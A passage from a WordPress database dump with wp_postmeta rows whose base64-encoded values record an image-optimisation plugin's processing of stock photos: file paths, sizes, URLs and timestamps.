VkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4ODkwLCJpZCI6MjQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg5MiwiaWQiOjI0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg4OTUsImlkIjoyNDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg4OTgsImlkIjoyNDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg5MDAsImlkIjoyNDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg5MDMsImlkIjoyNDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg5MDUsImlkIjoyNDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg5MDgsImlkIjoyNDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg5MTEsImlkIjoyNDd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30293, 246, 'wpfc_optimisation_reduction', '52920'); 
INSERT INTO `wp_postmeta` VALUES (30294, 246, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDguanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC5qcGciLCJ3aWR0aCI6MzAwMCwiaGVpZ2h0IjoyMDA4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDguanBnIiwicmVkdWN0aW9uIjo1MjkwNiwidGltZSI6MTQ4MzU4ODkyMCwiaWQiOiIyNDYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODkyMywiaWQiOjI0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC04MDB4NTM1LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTgwMHg1MzUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtODAweDUzNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg5MjYsImlkIjoyNDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtNzY4eDUxNC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC03Njh4NTE0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTc2OHg1MTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4OTI5LCJpZCI6MjQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTE2MDB4MTA3MS5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDcxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTE2MDB4MTA3MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC0xNjAweDEwNzEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4OTMyLCJpZCI6MjQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODkzNSwiaWQiOjI0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg5MzcsImlkIjoyNDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4OTQwLCJpZCI6MjQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODk0MywiaWQiOjI0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODk0NSwiaWQiOjI0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODk0NywiaWQiOjI0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODk1MCwiaWQiOjI0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODk1MiwiaWQiOjI0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODk1NSwiaWQiOjI0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG82MDAyNjA4LTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzYwMDI2MDgtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNjAwMjYwOC02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODk1OCwiaWQiOjI0Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (30295, 245, 'wpfc_optimisation_reduction', '143536'); 
INSERT INTO `wp_postmeta` VALUES (30296, 245, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzU0MzIxNzcuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNTQzMjE3Ny5qcGciLCJ3aWR0aCI6MzAwMCwiaGVpZ2h0IjoyMDAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzU0MzIxNzcuanBnIiwicmVkdWN0aW9uIjoxNDM1MjIsInRpbWUiOjE0ODM1ODg5NjksImlkIjoiMjQ1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNTQzMjE3Ny0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG81NDMyMTc3LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzU0MzIxNzctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg5NzEsImlkIjoyNDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzU0MzIxNzctODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNTQzMjE3Ny04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG81NDMyMTc3LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4OTc0LCJpZCI6MjQ1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX